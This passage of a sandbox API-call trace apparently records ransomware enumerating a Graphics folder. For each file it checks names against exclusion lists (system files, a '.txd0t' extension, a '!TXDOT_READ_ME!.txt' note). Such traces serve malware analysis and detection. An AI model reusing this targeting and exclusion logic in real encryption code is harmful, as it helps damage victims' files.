(lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="crypt_detect") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="cryptolocker") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="ransomware") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\WINDOWS") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files") returned 0x0 [0086.886] GetProcessHeap () returned 0xe30000 [0086.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xed76e0 [0086.886] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.886] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\*") returned="C:\\588bce7c90097ed212\\Graphics\\*" [0086.886] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0086.887] StrCmpW (psz1=".", psz2=".") returned 0 [0086.887] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.887] StrCmpW (psz1="..", psz2=".") returned 1 [0086.887] StrCmpW (psz1="..", psz2="..") returned 0 [0086.887] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0086.887] StrCmpW (psz1="Print.ico", psz2=".") returned 1 [0086.887] StrCmpW (psz1="Print.ico", psz2="..") returned 1 [0086.887] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.887] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.887] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Print.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Print.ico" [0086.888] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0086.888] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="bootsect.bak") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="iconcache.db") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="thumbs.db") returned -1 [0086.888] StrCmpIW (psz1="Print.ico", psz2=" ransomware ") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2=" ransom ") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="debug.txt") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="boot.ini") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="desktop.ini") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="autorun.inf") returned 1 [0086.888] StrCmpIW (psz1="Print.ico", psz2="ntuser.dat") returned 1 [0086.889] StrCmpIW (psz1="Print.ico", psz2="ntldr") returned 1 [0086.889] StrCmpIW (psz1="Print.ico", psz2="ntdetect.com") returned 1 [0086.889] StrCmpIW (psz1="Print.ico", psz2="bootfont.bin") returned 1 [0086.889] StrCmpIW (psz1="Print.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.889] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0086.889] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.889] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0086.889] StrCmpW (psz1="Rotate1.ico", psz2=".") returned 1 [0086.890] StrCmpW (psz1="Rotate1.ico", psz2="..") returned 1 [0086.890] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.890] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.890] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate1.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" [0086.890] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0086.890] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="bootsect.bak") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="iconcache.db") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="thumbs.db") returned -1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2=" ransomware ") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2=" ransom ") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="debug.txt") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="boot.ini") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="desktop.ini") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="autorun.inf") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="ntuser.dat") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="ntldr") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="ntdetect.com") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="bootfont.bin") returned 1 [0086.890] StrCmpIW (psz1="Rotate1.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.890] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0086.890] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.890] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0086.890] StrCmpW (psz1="Rotate2.ico", psz2=".") returned 1 [0086.890] StrCmpW (psz1="Rotate2.ico", psz2="..") returned 1 [0086.890] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.890] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.890] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate2.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" [0086.890] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0086.890] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.890] StrCmpIW (psz1="Rotate2.ico", psz2="bootsect.bak") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="iconcache.db") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="thumbs.db") returned -1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2=" ransomware ") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2=" ransom ") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="debug.txt") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="boot.ini") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="desktop.ini") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="autorun.inf") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="ntuser.dat") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="ntldr") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="ntdetect.com") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="bootfont.bin") returned 1 [0086.891] StrCmpIW (psz1="Rotate2.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.891] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0086.891] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.891] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0086.891] StrCmpW (psz1="Rotate3.ico", psz2=".") returned 1 [0086.891] StrCmpW (psz1="Rotate3.ico", psz2="..") returned 1 [0086.891] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.891] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.891] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate3.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" [0086.891] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0086.891] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="bootsect.bak") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="iconcache.db") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="thumbs.db") returned -1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2=" ransomware ") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2=" ransom ") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="debug.txt") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="boot.ini") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="desktop.ini") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="autorun.inf") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="ntuser.dat") returned 1 [0086.891] StrCmpIW (psz1="Rotate3.ico", psz2="ntldr") returned 1 [0086.892] StrCmpIW (psz1="Rotate3.ico", psz2="ntdetect.com") returned 1 [0086.892] StrCmpIW (psz1="Rotate3.ico", psz2="bootfont.bin") returned 1 [0086.892] StrCmpIW (psz1="Rotate3.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.892] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0086.892] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.892] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0086.892] StrCmpW (psz1="Rotate4.ico", psz2=".") returned 1 [0086.892] StrCmpW (psz1="Rotate4.ico", psz2="..") returned 1 [0086.892] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.892] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.892] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate4.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" [0086.892] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0086.892] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="bootsect.bak") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="iconcache.db") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="thumbs.db") returned -1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2=" ransomware ") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2=" ransom ") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="debug.txt") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="boot.ini") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="desktop.ini") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="autorun.inf") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="ntuser.dat") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="ntldr") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="ntdetect.com") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="bootfont.bin") returned 1 [0086.892] StrCmpIW (psz1="Rotate4.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.892] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0086.892] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.892] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0086.892] StrCmpW (psz1="Rotate5.ico", psz2=".") returned 1 [0086.892] StrCmpW (psz1="Rotate5.ico", psz2="..") returned 1 [0086.892] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.892] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.893] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate5.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" [0086.893] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0086.893] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="bootsect.bak") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="iconcache.db") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="thumbs.db") returned -1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2=" ransomware ") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2=" ransom ") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="debug.txt") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="boot.ini") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="desktop.ini") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="autorun.inf") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="ntuser.dat") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="ntldr") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="ntdetect.com") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="bootfont.bin") returned 1 [0086.893] StrCmpIW (psz1="Rotate5.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.893] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0086.893] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.893] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0086.893] StrCmpW (psz1="Rotate6.ico", psz2=".") returned 1 [0086.893] StrCmpW (psz1="Rotate6.ico", psz2="..") returned 1 [0086.893] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.893] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.893] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate6.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" [0086.893] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0086.893] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2="bootsect.bak") returned 1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2="iconcache.db") returned 1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2="thumbs.db") returned -1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2=" ransomware ") returned 1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2=" ransom ") returned 1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2="debug.txt") returned 1 [0086.893] StrCmpIW (psz1="Rotate6.ico", psz2="boot.ini") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="desktop.ini") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="autorun.inf") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="ntuser.dat") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="ntldr") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="ntdetect.com") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="bootfont.bin") returned 1 [0086.894] StrCmpIW (psz1="Rotate6.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.894] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0086.894] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.894] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0086.894] StrCmpW (psz1="Rotate7.ico", psz2=".") returned 1 [0086.894] StrCmpW (psz1="Rotate7.ico", psz2="..") returned 1 [0086.894] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.894] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.894] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate7.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" [0086.894] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0086.894] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="bootsect.bak") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="iconcache.db") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="thumbs.db") returned -1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2=" ransomware ") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2=" ransom ") returned 1 